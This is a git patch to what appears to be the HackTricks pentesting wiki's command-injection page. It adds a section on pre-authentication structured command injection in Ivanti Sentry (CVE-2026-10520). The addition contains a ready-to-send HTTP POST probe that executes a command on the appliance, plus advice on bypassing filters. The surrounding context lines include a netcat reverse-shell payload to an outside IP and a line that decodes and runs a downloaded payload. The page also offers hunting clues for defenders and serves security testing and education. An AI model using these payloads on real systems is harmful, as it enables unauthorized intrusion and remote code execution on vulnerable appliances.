From 2605e3d814f3f4f2886dab8d5cbe1cbc6f86a4b2 Mon Sep 17 00:00:00 2001 From: HackTricks News Bot Date: Wed, 10 Jun 2026 15:34:42 +0000 Subject: [PATCH] Add content from: CVE-2026-10520 and CVE-2026-10523: Multiple Critical Vulnera... --- src/pentesting-web/command-injection.md | 51 +++++++++++++++++++++++++ 1 file changed, 51 insertions(+) diff --git a/src/pentesting-web/command-injection.md b/src/pentesting-web/command-injection.md index 41a11880d6a..870f6fd57c1 100644 --- a/src/pentesting-web/command-injection.md +++ b/src/pentesting-web/command-injection.md @@ -67,6 +67,54 @@ vuln=127.0.0.1%0anohup nc -e /bin/bash 51.15.192.49 80 vuln=echo PAYLOAD > /tmp/pay.txt; cat /tmp/pay.txt | base64 -d > /tmp/pay; chmod 744 /tmp/pay; /tmp/pay ``` +### Structured configuration-command injection in appliance APIs (Ivanti Sentry) + +Some appliance management planes do **not** pass attacker input straight into `/bin/sh`. Instead, they expose an HTTP endpoint that accepts what looks like a normal form field, but the backend parses it as a **trusted internal configuration command**. + +**Pattern seen in Ivanti Sentry:** + +- Unauthenticated POST endpoint: `/mics/api/v2/sentry/mics-config/handleMessage` +- User-controlled form field: `message` +- Backend tokenizes `message` into an internal verb / module / XPath / XML body +- The `execute system /configuration/system/commandexec` path reaches the native command-execution feature +- The command itself lives inside the XML-like `reqandres` field, so this is **structured command injection**, not just `;id`-style shell metacharacter abuse + +Minimal probe: + +```http +POST /mics/api/v2/sentry/mics-config/handleMessage HTTP/1.1 +Host: +Content-Type: application/x-www-form-urlencoded + +message=execute+system+%2Fconfiguration%2Fsystem%2Fcommandexec+%3Ccommandexec%3E%3Cindex%3E1%3C%2Findex%3E%3Creqandres%3Eid%3C%2Freqandres%3E%3C%2Fcommandexec%3E +``` + +Decoded shape: + +``` +message=execute system /configuration/system/commandexec 1id +``` + +What makes this interesting during review: + +1. **Verb-based dispatch**: user input is split into tokens such as `execute`, `system`, and an internal configuration path. +2. **Structured body parsing**: the trailing data is parsed as XML/config rather than treated as a plain argument. +3. **Privileged backend bridge**: the request reaches native/admin functionality intended for trusted internal workflows. +4. **No classic metacharacters required**: if filters only block `;`, `&&`, `|`, or `$()`, the bug still works because the payload is syntactically valid for the appliance's own parser. + +Testing ideas for similar products: + +- Enumerate **unauthenticated or weakly protected management/config endpoints** that accept verbs, config paths, XML fragments, or CLI-like mini languages. +- Diff patched builds for hardcoded replacement payloads or newly blocked paths; they often reveal the exact internal command grammar. +- Try legitimate-looking verbs such as `execute`, `test`, `import`, `query`, `apply`, `run`, or `diagnose` instead of shell separators. +- If the response returns structured XML/JSON, check whether your command output is embedded inside success fields rather than echoed raw. + +Hunting clues: + +- POSTs to `/mics/api/v2/sentry/mics-config/handleMessage` +- `Content-Type: application/x-www-form-urlencoded` with `message=` +- Tokens such as `execute system`, `/configuration/system/commandexec`, ``, `` + ### Bash arithmetic evaluation in RewriteMap/CGI-style scripts RewriteMap helpers written in **bash** sometimes push query params into globals and later compare them in **arithmetic contexts** (`[[ $a -gt $b ]]`, `$((...))`, `let`). Arithmetic expansion re-tokenizes the content, so attacker-controlled variable names or array references are expanded twice and can execute. @@ -287,5 +335,8 @@ https://github.com/carlospolop/Auto_Wordlists/blob/main/wordlists/command_inject - [HTB: Gavel](https://0xdf.gitlab.io/2026/03/14/htb-gavel.html) - [CVE-2023-27350.py (auth bypass + print scripting automation)](https://github.com/horizon3ai/CVE-2023-27350/blob/main/CVE-2023-27350.py) - [Unit 42 – Bash arithmetic expansion RCE in Ivanti RewriteMap scripts](https://unit42.paloaltonetworks.com/ivanti-cve-2026-1281-cve-2026-1340/) +- [Rapid7 – CVE-2026-10520, CVE-2026-10523 - Multiple critical vulnerabilities affecting Ivanti Sentry](https://www.rapid7.com/blog/post/etr-cve-2026-10520-cve-2026-10523-multiple-critical-vulnerabilities-affecting-ivanti-sentry) +- [watchTowr Labs – Ivanti Sentry Pre-Auth OS Command Injection (CVE-2026-10520)](https://labs.watchtowr.com/more-evidence-that-words-dont-mean-what-we-thought-they-meant-ivanti-sentry-pre-auth-os-command-injection-cve-2026-10520/) +- [Ivanti advisory – Ivanti Sentry (CVE-2026-10520 / CVE-2026-10523)](https://hub.ivanti.com/s/article/Security-Advisory-Ivanti-Sentry-CVE-2026-10520-CVE-2026-10523?language=en_US) {{#include ../banners/hacktricks-training.md}}